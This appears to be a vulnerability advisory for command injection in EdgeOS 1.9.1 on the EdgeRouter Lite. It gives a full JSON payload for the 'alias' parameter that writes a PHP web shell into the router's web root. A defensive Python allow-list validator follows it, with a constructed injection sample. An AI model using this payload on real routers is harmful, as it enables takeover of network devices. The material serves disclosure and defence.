(EdgeOS) EdgeRouter Lite - 1.9.1

It is possible to execute arbitrary code on the router with admin credentials.

The problem occurs because the template at "/opt/vyatta/share/vyatta-cfg/templates/system/static-host-mapping/host-name/node.def" does not sanitize the parameters 'alias' and 'ips'.

Using this payload, and abusing the alias parameter, arbitrary code can be executed (it is necessary to adjust the Cookie and CSRF-TOKEN):

POST /api/edge/feature.json HTTP/1.1

{"data":{"scenario":"DNS_host_names","action":"apply",
 "apply":{"static-mapping":[
  {
   "hostname":"test",
   "alias":"dummy);sudo touch /var/www/htdocs/media/test.php; sudo echo PD9waHAKZXZhbCgkX0dFVFsnY21kJ10pOw== | base64 -d | >>/var/www/htdocs/media/test.php # ",
   "inet":"127.0.0.1"
  }
 ],"dynamic-mapping":[]}}}
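
The missing input check, sketched from the defender's side as an added example (not part of the original advisory and not Ubiquiti's code): each static-mapping field of a DNS_host_names request body is validated as a DNS name or an IP address, so a value carrying shell metacharacters is rejected before it reaches any shell context. The function names and both sample request bodies are constructed for illustration, and the sketch assumes each field holds a single value.

```python
import ipaddress
import json
import re

# RFC 1123 label: letters, digits, hyphen; no leading/trailing hyphen; 1-63 chars.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def is_hostname(value):
    """True only for a syntactically valid DNS name; ')' ';' '|' and spaces cannot pass."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))

def is_ip(value):
    """True for a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except (ValueError, TypeError):
        return False

# Field name -> validator (assumption: one value per field, as in the request above).
_CHECKS = (("hostname", is_hostname), ("alias", is_hostname), ("inet", is_ip))

def invalid_fields(body):
    """Return (entry_index, field) for every static-mapping value that fails validation."""
    entries = json.loads(body)["data"]["apply"]["static-mapping"]
    bad = []
    for i, entry in enumerate(entries):
        for field, check in _CHECKS:
            if field in entry and not check(entry[field]):
                bad.append((i, field))
    return bad

# Constructed sample bodies, shaped like the request in the advisory.
_TEMPLATE = ('{"data":{"scenario":"DNS_host_names","action":"apply","apply":'
             '{"static-mapping":[{"hostname":"test","alias":%s,"inet":"127.0.0.1"}],'
             '"dynamic-mapping":[]}}}')
BENIGN = _TEMPLATE % json.dumps("printer")
SUSPICIOUS = _TEMPLATE % json.dumps("dummy);id #")  # constructed metacharacter value

if __name__ == "__main__":
    print(invalid_fields(BENIGN))      # no findings
    print(invalid_fields(SUSPICIOUS))  # the alias field of entry 0 is flagged
```

The same allow-list can run in a reverse proxy or log pipeline in front of /api/edge/feature.json to flag requests whose mapping fields are not plain names or addresses.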